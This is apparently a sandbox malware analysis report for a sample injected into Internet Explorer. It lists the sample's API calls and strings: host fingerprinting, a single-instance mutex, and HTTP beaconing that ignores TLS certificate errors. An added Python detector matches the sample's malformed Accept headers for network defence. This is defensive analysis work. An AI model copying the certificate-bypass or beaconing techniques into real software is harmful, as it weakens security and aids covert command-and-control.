      • Part of subcall function 00511BD3: GlobalFree.KERNEL32(?), ref: 00511D71
      • Part of subcall function 00511BD3: GlobalFree.KERNEL32(?), ref: 00511D81
      • Part of subcall function 00511DA2: WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00511DDE
      • Part of subcall function 00511DA2: WinHttpGetIEProxyConfigForCurrentUser.WINHTTP(?), ref: 00511E18
      • Part of subcall function 00511DA2: memset.MSVCRT ref: 00511E87
      • Part of subcall function 00511DA2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000020,?,00000020), ref: 00511E9C
      • Part of subcall function 00511DA2: WinHttpGetProxyForUrl.WINHTTP(?,?,00000002,?), ref: 00511EB3
      • Part of subcall function 00511DA2: WinHttpSetOption.WINHTTP(?,00000026,00000003,0000000C), ref: 00511ED4
      • Part of subcall function 00511DA2: WinHttpCloseHandle.WINHTTP(?), ref: 00511EE8
      • Part of subcall function 00511DA2: ___swprintf_l.LIBCMT ref: 00511F39
      • Part of subcall function 00511DA2: GlobalFree.KERNEL32(?), ref: 00511F93
      • Part of subcall function 00511DA2: GlobalFree.KERNEL32(?), ref: 00511FA1
      • Part of subcall function 00511DA2: WinHttpOpen.WINHTTP(00000000,00000003,?,?,00000000), ref: 00511FAF
      • Part of subcall function 00511DA2: WinHttpOpen.WINHTTP(00000000,00000001,00000000,00000000,00000000), ref: 00511FE0
      • Part of subcall function 00511DA2: GetLastError.KERNEL32 ref: 00511FEC
      • Part of subcall function 0051207E: WinHttpOpen.WINHTTP(00000000,00000003,?,00000000,00000000,?,00000000,?,00513F1F,00000000,?), ref: 005120EC
      • Part of subcall function 00512176: WinHttpOpen.WINHTTP(00000000,00000003,?,00000000,00000000,?,HTTP,?,?,?,00513F99,00000000,?,00000000,?,00000000), ref: 005121C9
      • Part of subcall function 00518133: memset.MSVCRT ref: 00518179
      • Part of subcall function 00518133: GetLocalTime.KERNEL32(?,?,?,?), ref: 00518188
      • Part of subcall function 00518133: ___swprintf_l.LIBCMT ref: 005181D0
      • Part of subcall function 00518133: memset.MSVCRT ref: 0051821C
      • Part of subcall function 00518133: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000C800,00000000,00000000), ref: 00518239
      • Part of subcall function 00518133: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 0051825C
      • Part of subcall function 00518133: GetFileSize.KERNEL32(00000000,00000000), ref: 0051826B
      • Part of subcall function 00518133: SetEndOfFile.KERNEL32(00000000), ref: 00518280
      • Part of subcall function 00518133: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0051828D
      • Part of subcall function 00518133: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 005182CB
      • Part of subcall function 00518133: CloseHandle.KERNEL32(00000000), ref: 005182D2
      • Part of subcall function 00513409: WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 0051341B
      • Part of subcall function 00513409: WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 00513425
      • Part of subcall function 00513409: WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 0051342F
      • Part of subcall function 00513409: WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 00513439
      • Part of subcall function 00513409: WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 00513442
      • Part of subcall function 005141F0: GetLastError.KERNEL32(?,00000000,000003E9,?,?,?,?,?,00000000), ref: 0051429E
      • Part of subcall function 005141F0: ??2@YAPAXI@Z.MSVCRT ref: 005142DC
      • Part of subcall function 005141F0: ??3@YAXPAX@Z.MSVCRT ref: 0051443D
      • Part of subcall function 005141F0: ??3@YAXPAX@Z.MSVCRT ref: 0051444B
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd

    Control-flow Graph

    APIs
    • LoadLibraryA.KERNEL32(Netapi32), ref: 00517177
    • GetProcAddress.KERNELBASE(00000000), ref: 0051717E
    • LoadLibraryA.KERNEL32(Netapi32), ref: 00517197
    • GetProcAddress.KERNEL32(00000000), ref: 0051719E
    • memset.MSVCRT ref: 005171B2
    • GetUserNameA.ADVAPI32(000001D0,?), ref: 005171CE
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000040), ref: 005171F2
    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000210,00000040,00000000,00000000), ref: 0051725E
    • ConvertSidToStringSidA.ADVAPI32(?,?), ref: 0051726E
      • Part of subcall function 0051A805: _errno.MSVCRT ref: 0051A832
      • Part of subcall function 0051A805: _errno.MSVCRT ref: 0051A8AC
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • IsDebuggerPresent.KERNEL32 ref: 004F142F
    • CreateThread.KERNEL32(00000000,00000000,004F120F,00000000,00000000,00000000), ref: 004F1482
    • ??2@YAPAXI@Z.MSVCRT ref: 004F14D6
      • Part of subcall function 004F268D: memset.MSVCRT ref: 004F26B8
    • ??3@YAXPAX@Z.MSVCRT ref: 004F1528
      • Part of subcall function 004F1A6D: ??2@YAPAXI@Z.MSVCRT ref: 004F1A8C
      • Part of subcall function 004F1A6D: memset.MSVCRT ref: 004F1A9C
      • Part of subcall function 004F1A6D: memcpy.MSVCRT ref: 004F1AB8
      • Part of subcall function 004F1A6D: memcpy.MSVCRT ref: 004F1AE9
      • Part of subcall function 004F1A6D: ??3@YAXPAX@Z.MSVCRT ref: 004F1AFE
      • Part of subcall function 004F1A6D: ??2@YAPAXI@Z.MSVCRT ref: 004F1B1B
    • ??3@YAXPAX@Z.MSVCRT ref: 004F154A
      • Part of subcall function 004F1C8F: ??2@YAPAXI@Z.MSVCRT ref: 004F1CAE
      • Part of subcall function 004F1C8F: memset.MSVCRT ref: 004F1CBE
      • Part of subcall function 004F1C8F: memcpy.MSVCRT ref: 004F1CDA
      • Part of subcall function 004F1C8F: memcpy.MSVCRT ref: 004F1D0B
      • Part of subcall function 004F1C8F: ??3@YAXPAX@Z.MSVCRT ref: 004F1D20
      • Part of subcall function 004F1C8F: ??2@YAPAXI@Z.MSVCRT ref: 004F1D3D
      • Part of subcall function 004F15F1: CreateFileMappingA.KERNEL32(000000FF,00000000,00000040,00000000,00000000,00000000), ref: 004F1625
      • Part of subcall function 004F15F1: MapViewOfFile.KERNELBASE(00000000,00000022,00000000,00000000,00000000), ref: 004F1634
      • Part of subcall function 004F15F1: UnmapViewOfFile.KERNEL32(?), ref: 004F1657
      • Part of subcall function 004F15F1: CloseHandle.KERNEL32(?), ref: 004F1660
    • ??3@YAXPAX@Z.MSVCRT ref: 004F15A8
    • UnmapViewOfFile.KERNEL32(?), ref: 004F15C6
    • CloseHandle.KERNEL32(?), ref: 004F15D0
      • Part of subcall function 004F26F1: printf.MSVCRT ref: 004F2714
      • Part of subcall function 004F32A0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004F3CE2
      • Part of subcall function 004F32A0: UnhandledExceptionFilter.KERNEL32(004F6190), ref: 004F3CED
      • Part of subcall function 004F32A0: GetCurrentProcess.KERNEL32(C0000409), ref: 004F3CF8
      • Part of subcall function 004F32A0: TerminateProcess.KERNEL32(00000000), ref: 004F3CFF
    Strings
    • Ss)4:WKsRr(3/VJrQq&2.UIqPp%1-THp, xrefs: 004F14E1
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    APIs
    • memset.MSVCRT ref: 00516428
    • GetTempPathA.KERNEL32(00000104,?), ref: 0051643E
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A741
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A788
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7B5
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7F0
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
      • Part of subcall function 00511024: time.MSVCRT ref: 00511080
      • Part of subcall function 00511024: srand.MSVCRT ref: 00511086
    • memset.MSVCRT ref: 005164A6
    • GetLocalTime.KERNEL32(?), ref: 005164D6
      • Part of subcall function 005135D4: __EH_prolog3_GS.LIBCMT ref: 005135DE
      • Part of subcall function 005135D4: CreateMutexA.KERNELBASE(00000000,00000001,donotbotherme,000002A8,00516509,?,?), ref: 00513607
      • Part of subcall function 005135D4: GetLastError.KERNEL32 ref: 0051360F
      • Part of subcall function 005135D4: inet_addr.WS2_32(?), ref: 005136FD
      • Part of subcall function 005135D4: GetLocalTime.KERNEL32(?,?), ref: 00513780
      • Part of subcall function 005135D4: GetLocalTime.KERNEL32(?), ref: 005137B5
      • Part of subcall function 005135D4: WaitForSingleObject.KERNEL32(?,000927C0), ref: 005137C2
      • Part of subcall function 005135D4: GetLocalTime.KERNEL32(?), ref: 005137DD
      • Part of subcall function 005135D4: WaitForSingleObject.KERNEL32(?,000927C0), ref: 005137EA
      • Part of subcall function 005135D4: time.MSVCRT ref: 005138C0
      • Part of subcall function 005135D4: srand.MSVCRT ref: 005138C7
      • Part of subcall function 005135D4: rand.MSVCRT ref: 005138D9
      • Part of subcall function 005135D4: WaitForSingleObject.KERNEL32(?,00000000), ref: 0051393E
      • Part of subcall function 005135D4: time.MSVCRT ref: 005139B0
      • Part of subcall function 005135D4: srand.MSVCRT ref: 005139B7
      • Part of subcall function 005135D4: rand.MSVCRT ref: 005139C3
      • Part of subcall function 005135D4: WaitForSingleObject.KERNEL32(?,?), ref: 00513A17
      • Part of subcall function 005135D4: CloseHandle.KERNEL32(00000000), ref: 00513A61
    • GetLocalTime.KERNEL32(?,?,?), ref: 00516512
      • Part of subcall function 00513409: WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 0051341B
      • Part of subcall function 00513409: WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 00513425
      • Part of subcall function 00513409: WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 0051342F
      • Part of subcall function 00513409: WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 00513439
      • Part of subcall function 00513409: WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 00513442
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    • C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp, xrefs: 00516463
    • Client Start!, xrefs: 0051647A
    • FXSAPIDebugLogFile.tmp, xrefs: 00516444
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 00514B9C
    • GetAdaptersInfo.IPHLPAPI(00000000,6Q), ref: 00514BAC
    • ??3@YAXPAX@Z.MSVCRT ref: 00514BB7
    • ??2@YAPAXI@Z.MSVCRT ref: 00514BC0
    • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 00514BD0
      • Part of subcall function 00514AAC: ??2@YAPAXI@Z.MSVCRT ref: 00514AC6
      • Part of subcall function 00514AAC: GetAdaptersInfo.IPHLPAPI(00000000,00000000), ref: 00514AD6
      • Part of subcall function 00514AAC: ??3@YAXPAX@Z.MSVCRT ref: 00514AE1
      • Part of subcall function 00514AAC: ??2@YAPAXI@Z.MSVCRT ref: 00514AE9
      • Part of subcall function 00514AAC: GetAdaptersInfo.IPHLPAPI(00000000,00000000), ref: 00514AFA
      • Part of subcall function 00514AAC: ??3@YAXPAX@Z.MSVCRT ref: 00514B71
    • ??3@YAXPAX@Z.MSVCRT ref: 00514C60
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(kernel32,GetDiskFreeSpaceExW,00000040,?,?,00517D23,00000000,00000000), ref: 00516D70
    • GetProcAddress.KERNEL32(00000000,?,?,00517D23,00000000,00000000), ref: 00516D77
      • Part of subcall function 0051663C: malloc.MSVCRT ref: 0051663D
    • GetTempPathW.KERNEL32(00000104,00000000), ref: 00516D98
    • GetDiskFreeSpaceExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00517D23,00000000,00000000), ref: 00516DAD
      • Part of subcall function 00516653: free.MSVCRT(00000000,00513A3A), ref: 0051665E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • GetLocaleInfoA.KERNEL32(00000400,00000059,00000298,00000010,00000000,00000040,00000000), ref: 00516E2D
    • GetLocaleInfoA.KERNEL32(00000400,0000005A,000002A8,00000010), ref: 00516E4F
      • Part of subcall function 0051668C: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00020019,00000000,?,005169F7,00000080,00000000,?,?,005169F7,?,?), ref: 005166CF
      • Part of subcall function 0051668C: RegCloseKey.ADVAPI32(00000000,?,?,005169F7,?,?,?,00000000,00020019), ref: 005166DA
    • __swprintf_c_l.LIBCMT ref: 0051710B
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd

    Control-flow Graph

    APIs
    • memset.MSVCRT ref: 0051284B
      • Part of subcall function 005123CA: memset.MSVCRT ref: 00512458
      • Part of subcall function 005123CA: rand.MSVCRT ref: 0051246D
      • Part of subcall function 005123CA: rand.MSVCRT ref: 0051249B
      • Part of subcall function 005123CA: rand.MSVCRT ref: 005124BF
      • Part of subcall function 005123CA: rand.MSVCRT ref: 005124DB
      • Part of subcall function 005123CA: rand.MSVCRT ref: 00512505
      • Part of subcall function 005123CA: rand.MSVCRT ref: 0051253C
      • Part of subcall function 005123CA: rand.MSVCRT ref: 0051257E
      • Part of subcall function 005123CA: rand.MSVCRT ref: 005125B5
      • Part of subcall function 005123CA: ___swprintf_l.LIBCMT ref: 005125E9
      • Part of subcall function 005123CA: memset.MSVCRT ref: 0051263B
      • Part of subcall function 005123CA: rand.MSVCRT ref: 00512650
      • Part of subcall function 005123CA: rand.MSVCRT ref: 0051267F
      • Part of subcall function 005123CA: rand.MSVCRT ref: 005126A4
      • Part of subcall function 005123CA: ___swprintf_l.LIBCMT ref: 005126CA
    • rand.MSVCRT ref: 00512862
    • WinHttpOpenRequest.WINHTTP(?,GET,?,00000000,00000000,00000000,-002EDD5D,?,00000000,00000000,?,00000000), ref: 005128D5
    • GetLastError.KERNEL32 ref: 005128E5
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    • WinHttpSetOption.WINHTTP(00000000,00000006,?,00000004), ref: 0051291B
    • WinHttpQueryOption.WINHTTP(?,0000001F,?,?), ref: 00512949
    • WinHttpSetOption.WINHTTP(?,0000001F,00003300,00000004), ref: 0051296A
    • WinHttpSetOption.WINHTTP(?,0000002F,00000000,00000000), ref: 00512972
    • memset.MSVCRT ref: 0051298A
    • ___swprintf_l.LIBCMT ref: 005129A7
    • WinHttpAddRequestHeaders.WINHTTP(?,?,?,20000000), ref: 005129E0
    • GetLastError.KERNEL32 ref: 005129E6
    • memset.MSVCRT ref: 00512A0D
      • Part of subcall function 005126EC: rand.MSVCRT ref: 00512725
      • Part of subcall function 005126EC: memset.MSVCRT ref: 0051274A
      • Part of subcall function 005126EC: rand.MSVCRT ref: 0051275D
      • Part of subcall function 005126EC: rand.MSVCRT ref: 0051279E
      • Part of subcall function 005126EC: rand.MSVCRT ref: 005127C3
      • Part of subcall function 005126EC: ___swprintf_l.LIBCMT ref: 005127ED
    • ___swprintf_l.LIBCMT ref: 00512A35
    • WinHttpAddRequestHeaders.WINHTTP(?,?,?,20000000), ref: 00512A63
    • GetLastError.KERNEL32 ref: 00512A69
    • ___swprintf_l.LIBCMT ref: 00512A8D
    • WinHttpAddRequestHeaders.WINHTTP(?,?,?,20000000), ref: 00512ABB
    • GetLastError.KERNEL32 ref: 00512AC1
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051A9D3
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051AA1C
    • WinHttpAddRequestHeaders.WINHTTP(?,?,?,20000000), ref: 00512B0D
    • GetLastError.KERNEL32 ref: 00512B13
    • WinHttpAddRequestHeaders.WINHTTP(?,?,?,20000000), ref: 00512B5F
    • GetLastError.KERNEL32 ref: 00512B65
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    • User-Agent: %s, xrefs: 00512996
    • GET, xrefs: 00512826, 005128D1
    • xQ, xrefs: 00512A7A
    • Accept-Encoding: gzip, deflate, xrefs: 00512B24
    • text/html,text/javascript, q=0.9,*/*, q=0.8, xrefs: 0051288D
    • image/png,image/*, q=0.8,*/*, q=0.5, xrefs: 00512899
    • WinHttpAddRequestHeaders Host failed! - %d, xrefs: 00512A70
    • Accept: %s, xrefs: 00512A86
    • */*, xrefs: 00512881
    • Accept-Language: en-US, xrefs: 00512AD2
    • WinHttpAddRequestHeaders UserAgent failed! - %d, xrefs: 005129ED
    • Host: %s, xrefs: 00512A23
    • WinHttpAddRequestHeaders 2 failed! - %d, xrefs: 00512B1A
    • POST, xrefs: 00512830
    • WinHttpAddRequestHeaders Accept failed! - %d, xrefs: 00512AC8
    • WinHttpAddRequestHeaders 3 failed! - %d, xrefs: 00512B6C
    • application/jason,application/xml, q=0.9,*/*, q=0.8, xrefs: 005128A5
    • WinHttpOpenRequest failed! - %d, xrefs: 005128EC
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
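    The request builder above assembles the client's HTTP headers from fixed format strings, and two details of it matter for network detection. First, the Accept values it rotates through are malformed: the quality parameters are written as ", q=" instead of ";q=", and "application/jason" is a typo for "application/json", so a sensor can match them without knowing the User-Agent or Host. Second, WinHttpSetOption with option 0000001F and value 00003300 sets WINHTTP_OPTION_SECURITY_FLAGS to SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID (constants from the WinHTTP headers), so the client accepts any server certificate and a TLS-inspecting proxy sees these headers in the clear. The Python below is an added example, not code from the report or from the sample: it matches a captured request against the header strings listed above. The two request texts are constructed; their User-Agent, Host and path values are placeholders, because the report shows only the "User-Agent: %s" and "Host: %s" format strings.

```python
"""Fingerprint HTTP requests that carry the header strings of this sample's
request builder (added example; the Accept values, 'Accept-Language: en-US'
and 'Accept-Encoding: gzip, deflate' are copied from the report's string list)."""
import re

# Accept values the builder selects among, copied verbatim from the report.
# All three use ', q=' where RFC 7231 uses ';q=', and one says 'application/jason'.
# The fourth value in the report, '*/*', is omitted because many clients send it.
DISTINCT_ACCEPT = {
    "text/html,text/javascript, q=0.9,*/*, q=0.8",
    "image/png,image/*, q=0.8,*/*, q=0.5",
    "application/jason,application/xml, q=0.9,*/*, q=0.8",
}
# Headers the builder always adds with fixed values (copied from the report).
FIXED = {"accept-language": "en-US", "accept-encoding": "gzip, deflate"}
# A quality parameter introduced by a comma instead of a semicolon.
MALFORMED_Q = re.compile(r",\s*q=\d")


def parse_request(raw: str):
    """Return (method, headers) for a raw HTTP/1.x request; header names lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *lines = head.split("\r\n")
    method = request_line.split(" ", 1)[0]
    headers = {}
    for line in lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, headers


def fingerprint(raw: str):
    """Return the list of matched traits, in a fixed order; empty means no match."""
    _method, headers = parse_request(raw)
    traits = []
    accept = headers.get("accept", "")
    if accept in DISTINCT_ACCEPT:
        traits.append("accept-exact")
    if "application/jason" in accept:
        traits.append("accept-jason-typo")
    if MALFORMED_Q.search(accept):
        traits.append("accept-malformed-q")
    if all(headers.get(k) == v for k, v in FIXED.items()):
        traits.append("fixed-lang-encoding")
    return traits


def is_suspicious(raw: str) -> bool:
    """True for a sample-specific Accept value, or for the malformed quality
    syntax combined with the fixed language/encoding pair (the pair alone is
    too common to alert on)."""
    t = set(fingerprint(raw))
    return bool(t & {"accept-exact", "accept-jason-typo"}) or \
        {"accept-malformed-q", "fixed-lang-encoding"} <= t


# Constructed request in the shape the builder's format strings produce;
# the User-Agent, Host and path are placeholders, not values from the report.
SAMPLE_BEACON = (
    "GET /index.php HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Host: example.invalid\r\n"
    "Accept: application/jason,application/xml, q=0.9,*/*, q=0.8\r\n"
    "Accept-Language: en-US\r\n"
    "Accept-Encoding: gzip, deflate\r\n\r\n"
)
# Constructed browser-style request for comparison: ';q=' syntax, no typo.
SAMPLE_BENIGN = (
    "GET / HTTP/1.1\r\n"
    "Host: example.invalid\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    "Accept-Language: en-US\r\n"
    "Accept-Encoding: gzip, deflate\r\n\r\n"
)

if __name__ == "__main__":
    for name, req in (("beacon", SAMPLE_BEACON), ("benign", SAMPLE_BENIGN)):
        print(name, is_suspicious(req), fingerprint(req))
```

    The check deliberately ignores header order and the User-Agent, since the report shows the agent string only as a format argument; if the same malformed Accept strings show up in other samples of this family, the exact-match set is the part worth carrying into an IDS rule.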

    Control-flow Graph

    Function 005135D4 (the rendered graph and its executed/not-executed colouring were not captured; the list below is recovered from the graph data). After the CreateMutexA/GetLastError block, 0051361D-00513622 either proceeds through 00513624 to the CloseHandle block at 00513A61 and the epilogue (00513A69, call 0051D4F5) or enters the main body at 0051362A; block 00513A20 branches back to 00513754, the head of the outer loop. Blocks containing calls, in address order:
    • 005135D4-00513617: call 0051D4AB, CreateMutexA, GetLastError
    • 0051362A-00513696: call 00517FBE (five times), call 005148A0, call 0051494C
    • 005136D3-005136DD: call 005149DD
    • 005136DF-005136EC: call 00514B82
    • 005136EE-005136F8: call 00517FBE
    • 005136F9-00513705: inet_addr
    • 0051370B-0051370D: call 00514C71
    • 00513725-0051372D: call 00517C7C
    • 0051375F-0051379B: GetLocalTime, call 00517FBE
    • 005137AE-005137C4: GetLocalTime, WaitForSingleObject (loops through 0051379D-005137A7)
    • 005137D6-005137F6: GetLocalTime, WaitForSingleObject (loops through 005137D1-005137D4)
    • 0051384A-00513853: call 00513A71
    • 0051385C-00513870: call 00517FBE
    • 005138B8-00513947: time, srand, rand, call 00517FBE, WaitForSingleObject
    • 00513959-0051396E: call 00513A71
    • 00513970-00513992: call 00517FBE
    • 0051399E-005139A9: call 00516653
    • 005139AF-005139EA: time, srand, rand
    • 005139F2-00513A02: call 00517FBE
    • 00513A07-00513A17: WaitForSingleObject
    • 00513A2F-00513A35: call 00516653
    • 00513A3F-00513A51: call 00517FBE
    • 00513A53-00513A5E: call 00516653
    • 00513A61: CloseHandle
    • 00513A69-00513A6E: call 0051D4F5
    APIs
    • __EH_prolog3_GS.LIBCMT ref: 005135DE
    • CreateMutexA.KERNELBASE(00000000,00000001,donotbotherme,000002A8,00516509,?,?), ref: 00513607
    • GetLastError.KERNEL32 ref: 0051360F
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
      • Part of subcall function 005148A0: memset.MSVCRT ref: 005148B7
      • Part of subcall function 005148A0: SHGetSpecialFolderPathA.SHELL32(00000000,-0000D007,0000001C,00000000), ref: 005148C4
      • Part of subcall function 005148A0: CreateDirectoryA.KERNELBASE(-0000D007,00000000), ref: 005148E1
